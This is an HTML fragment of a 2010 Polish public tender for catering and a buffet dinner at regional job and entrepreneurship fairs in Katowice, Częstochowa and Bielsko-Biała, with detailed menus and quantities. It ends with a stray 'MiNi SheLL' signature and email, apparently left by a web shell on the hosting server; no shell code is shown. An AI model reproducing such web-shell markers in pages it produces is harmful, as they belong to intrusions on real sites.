<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  ul. Kościuszki 30 , pok. 304-305.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2010 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Katowicach,  ul. Kościuszki 30 , pok. 352 - Kancelaria Urzędu, III piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Grant Eures.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usługi cateringowej dla  200 osób - gości i wystawców podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w Katowicach w dniu 18.06.2010 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Na usługę składać się będą:
1) Napoje gorące:
- kawa rozpuszczalna podana w termosach, wraz z dodatkami - mleczko lub śmietanka, cukier (bez ograniczeń), 
- herbata  podana w termosach, wraz z dodatkami - cytryna, cukier (bez ograniczeń), 
2) Napoje zimne:
- woda mineralna niegazowana (150 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (100 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (100 porcji x 200 ml), jabłkowy (100 porcji x 200 ml), z czarnej porzeczki (100 porcji x 200 ml), podawane w szklanych dzbankach, 
3)  Kanapki bankietowe na białym i ciemnym pieczywie:
- z szynką i pomidorem (60 szt x 40 g),
- z serem typu camembert i orzechem włoskim (60 szt x 40 g),
- z twarożkiem, szczypiorkiem i orzechem włoskim (60 szt. x 40 g),
- z łososiem i cytrynką (60 szt. x 40 g),
- z jajkiem i kolorowym kawiorem (60 szt. x 40 g),
- z salami i marynatami (60 szt. x 40 g),
- z żółtym serem i oliwkami (60 szt. x 40 g); 
4) Sałatki - 2 rodzaje:
- sałatka grecka (150 porcji x 100 g)
- sałatka hawajska z kurczakiem, ananasem, kukurydzą i majonezem (150 porcji x 100 g),
5) Świeże owoce podawane na paterach:
-  jabłka - 2 kg,
- banany - 1,5 kg,
- winogrona (zielone, czarne) - 3 kg,
- pomarańcze - 1,5 kg,
- mandarynki - 2 kg,
6) Ciastka bankietowe:
- mini ciastka francuskie z jabłkiem/ brzoskwinią (80 porcji x 65 g),
- szarlotka (80 porcji x 65 g),
- mini drożdżówka (80 porcji x 65 g),  
7) Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (60 szt.),
- babeczki z łososia wędzonego (60 szt),
- ruloniki ze schabu z musem chrzanowym (60 szt),
- jajka faszerowane z pieczarką (60 szt),
- koreczki mini caprese (mozarella i pomidorki - 30 szt),
- koreczki z serem żółtym i kabanosem (30 szt),
8) Ciepły posiłek (do podania w podgrzewaczach na godz. 12:00)
- bogracz, strogonow lub równoważne danie firmowe (120 porcji x 200 ml), 
- pierogi mieszane - ruskie, z mięsem, z kapustą i grzybami (120 porcji x 200 g), 
- pieczywo mieszane (białe, ciemne - 120 porcji x 50 g),
9) produkty do rozłożenia na stoiskach targowych: 
- 150 butelek (500 ml) wody mineralnej gazowanej,
- 150 butelek (500 ml) wody mineralnej niegazowanej,
- 150 kubeczków jednorazowych,
- słone paluszki (70 opakowań po min. 70g). 
Catering powinien zostać dostarczony do miejsca odbywania Targów - Gmachu Śląskiego Urzędu Wojewódzkiego ul. Jagiellońska 25, Sala Szara, na godz. 9:00 natomiast ciepły posiłek  na godzinę 12:00.  
Ponadto Wykonawca zobowiązany jest  zapewnić:
- zastawę białą porcelanową, sztućce trwałe, 
- dekorację stołu - obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe,
- obsługę kelnerską przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00),
- transport..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usługi cateringowej dla  40 osób - gości i wystawców podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w Częstochowie w dniu 18.06.2010 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Na usługę składać się będą:
1) Napoje gorące:
- kawa rozpuszczalna podana w termosach, wraz z dodatkami - mleczko lub śmietanka, cukier (bez ograniczeń), 
- herbata  podana w termosach, wraz z dodatkami - cytryna, cukier (bez ograniczeń), 
2) Napoje zimne:
- woda mineralna niegazowana (25 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (20 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (25 porcji x 200 ml), jabłkowy (25 porcji x 200 ml), z czarnej porzeczki (25 porcji x 200 ml), podawane w szklanych dzbankach, 
3)  Kanapki bankietowe na białym i ciemnym pieczywie:
- z szynką i pomidorkiem (13 szt x 40 g),
- z serem typu camembert i orzechem włoskim (13 szt x 40 g),
- z twarożkiem, szczypiorkiem i orzechem włoskim (13 szt. x 40 g),
- z łososiem i cytrynką (13 szt. x 40 g),
- z jajkiem i kolorowym kawiorem (13 szt. x 40 g),
- z salami i marynatami (13 szt. x 40 g),
- z żółtym serem i oliwkami (13 szt. x 40 g); 
4) Sałatki - 2 rodzaje:
- sałatka grecka (30 porcji x 100 g),
- sałatka hawajska z kurczakiem, ananasem, kukurydzą i majonezem (30 porcji x 100 g),
5) Świeże owoce podawane na paterach:
-  jabłka - 1 kg,
- banany - 1 kg,
- winogrona (zielone, czarne) - 1 kg,
- pomarańcze - 1 kg,
- mandarynki - 1 kg
6) Ciastka bankietowe:
- mini ciastka francuskie z jabłkiem/ brzoskwinią (15 porcji x 65 g),
- szarlotka (15 porcji x 65 g),
- mini drożdżówka (15 porcji x 65 g),  
7) Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (10 szt.),
- babeczki z łososia wędzonego (10 szt),
- ruloniki ze schabu z musem chrzanowym (10 szt),
- jajka faszerowane z pieczarką (10 szt),
- koreczki mini caprese (mozarella i pomidorki - 10 szt),
- koreczki z serem żółtym i kabanosem (10 szt)
8) Ciepły posiłek (do podania w podgrzewaczach na godz. 12:00):
- bogracz, strogonow lub równoważne danie firmowe (25 porcji x 200 ml), 
- pierogi mieszane - ruskie, z mięsem, z kapustą i grzybami (25 porcji x 200 g), 
- pieczywo mieszane (białe, ciemne - 25 porcji x 50 g),
9) Produkty do rozłożenia na stoiskach targowych: 
- 30 butelek (500 ml) wody mineralnej gazowanej,
- 30 butelek (500 ml) wody mineralnej niegazowanej,
- 60 kubeczków jednorazowych,
- słone paluszki (30 opakowań po min. 70g). 
Catering powinien zostać dostarczony do miejsca odbywania Targów - VII Liceum Ogólnokształcące im. Mikołaja Kopernika w Częstochowie ul. Nowowiejskiego 18, do pomieszczeń szatni hali sportowej na godz. 9:00 natomiast ciepły posiłek na godzinę 12:00.  
Ponadto Wykonawca zobowiązany jest zapewnić:
- zastawę białą porcelanową, sztućce trwałe, 
- dekorację stołu - obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe,
- obsługę kelnerską przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00).
- transport..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usługi cateringowej dla  40 osób - gości i wystawców podczas Europejskich Targów Przedsiębiorczości, Pracy i Edukacji w Bielsku - Białej w dniu 18.06.2010 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Na usługę składać się będą:
1) Napoje gorące:
- kawa rozpuszczalna podana w termosach, wraz z dodatkami - mleczko lub śmietanka, cukier (bez ograniczeń), 
- herbata  podana w termosach, wraz z dodatkami - cytryna, cukier (bez ograniczeń), 
2) Napoje zimne:
- woda mineralna niegazowana (25 butelek plastikowych o pojemności 500 ml), 
- woda mineralna gazowana (20 butelek plastikowych o pojemności 500 ml), 
- soki - pomarańczowy (25 porcji x 200 ml), jabłkowy (25 porcji x 200 ml), z czarnej porzeczki (25 porcji x 200 ml), podawane w szklanych dzbankach, 
3)  Kanapki bankietowe na białym i ciemnym pieczywie (wek i pumpernikiel):
- z szynką i pomidorkiem (13 szt x 40 g),
- z serem typu camembert i orzechem włoskim (13 szt x 40 g),
- z twarożkiem, szczypiorkiem i orzechem włoskim (13 szt. x 40 g),
- z łososiem i cytrynką (13 szt. x 40 g),
- z jajkiem i kolorowym kawiorem (13 szt. x 40 g),
- z salami i marynatami (13 szt. x 40 g),
- z żółtym serem i oliwkami (13 szt. x 40 g); 
4) sałatki - 2 rodzaje:
- sałatka grecka (30 porcji x 100 g),
- sałatka hawajska z kurczakiem, ananasem, kukurydzą i majonezem (30 porcji x 100 g),
5) Świeże owoce podawane na paterach:
-  jabłka - 1 kg,
- banany - 1 kg,
- winogrona (zielone, czarne) - 1 kg,
- pomarańcze - 1 kg,
- mandarynki - 1 kg
6) Ciastka bankietowe:
- mini ciastka francuskie z jabłkiem/ brzoskwinią (15 porcji x 65 g),
- szarlotka (15 porcji x 65 g),
- mini drożdżówka (15 porcji x 65 g),  
7) Przekąski koktajlowe:
- mini- quiche z brokułami i tuńczykiem (10 szt.),
- babeczki z łososia wędzonego (10 szt),
- ruloniki ze schabu z musem chrzanowym (10 szt),
- jajka faszerowane z pieczarką (10 szt),
- koreczki mini caprese (mozarella i pomidorki - 10 szt),
- koreczki z serem żółtym i kabanosem (10 szt),
8) Ciepły posiłek (do podania w podgrzewaczach na godz. 12:00)
- bogracz, strogonow lub równoważne danie firmowe (25 porcji x 200 ml), 
- pierogi mieszane - ruskie, z mięsem, z kapustą i grzybami (25 porcji x 200 g), 
- pieczywo mieszane (białe, ciemne - 25 porcji x 50 g),
9) Produkty do rozłożenia na stoiskach targowych: 
- 30 butelek (500 ml) wody mineralnej gazowanej,
- 30 butelek (500 ml) wody mineralnej niegazowanej,
- 60 kubeczków jednorazowych,
- słone paluszki (30 opakowań po min. 70g). 
Catering powinien zostać dostarczony do miejsca odbywania Targów - Wyższa Szkoła Bankowości i Finansów w Bielsku - Białej, ul. Tańskiego 5, sala cateringowa, II piętro, pokój nr 317  na godz. 9:00, natomiast ciepły posiłek na godzinę 12:00.  
Ponadto Wykonawca zobowiązany jest zapewnić:
- zastawę białą porcelanową, sztućce trwałe, 
- dekorację stołu - obrusy materiałowe jednokolorowe, dopasowane serwetki papierowe,
- obsługę kelnerską przez cały czas trwania wydarzenia (w godz. 9:00 - 14:00),
- transport..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usługi restauracyjnej - kolacji, w formie bufetu szwedzkiego wydanej w lokalu, który zapewni Wykonawca, w dniu 18.06.2010r. o godz. 18:00 dla 22 gości zagranicznych i wystawców biorących udział w Europejskich Targach Przedsiębiorczości, Pracy i Edukacji w Katowicach oraz przedstawicieli organizatora..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Na usługę składać się będą:
- 3 rodzaje przystawek (mozarella z pomidorami, bazylią, oliwą z oliwek i sosem balsamicznym, pieczarki faszerowane z szynką lub ziołami, carpaccio z polędwicy wołowej lub łososia), 
- 3 rodzaje zup (rosół z makaronem, krem z borowików, żurek z białą kiełbasą i jajkiem), 
- 3 dania główne (szaszłyk drobiowy, makaron Carbonara, dorsz w koszulce z masłem koperkowym),
- dodatki: grillowane warzywa (bakłażan, cukinia, marchew, cebula, papryka), ryż, zapiekane ziemniaki, 
- deser: ciasto cytrynowe, świeże owoce, deska serów, 
- napoje: woda mineralna, soki (jabłkowy, z czarnej porzeczki), kawa, herbata, 1 lampka wina,
- zimna płyta: rożki szynkowe (wysokogatunkowe wędliny nadziewane papryką, oliwkami itp.), deska serów, śledź w śmietanie, tymbaliki z drobiu, mięso pieczone nadziewane (schab nadziewany kiełbasą wiejską, szynka pieczona), sałatka jarzynowa, sałatka ryżowa z tuńczykiem, jajka faszerowane, pieczywo, masło.
- obsługa kelnerska. 
Restauracja powinna być zlokalizowana w granicach administracyjnych miasta Katowice oraz dysponować wyodrębnioną salą zdolną pomieścić 22 gości przy stołach ustawionych w kształcie podkowy lub w kształcie prostokąta.    
Ostateczna liczba uczestników zostanie przekazana Wykonawcy na 2 dni robocze przed wykonaniem usługi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.06.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com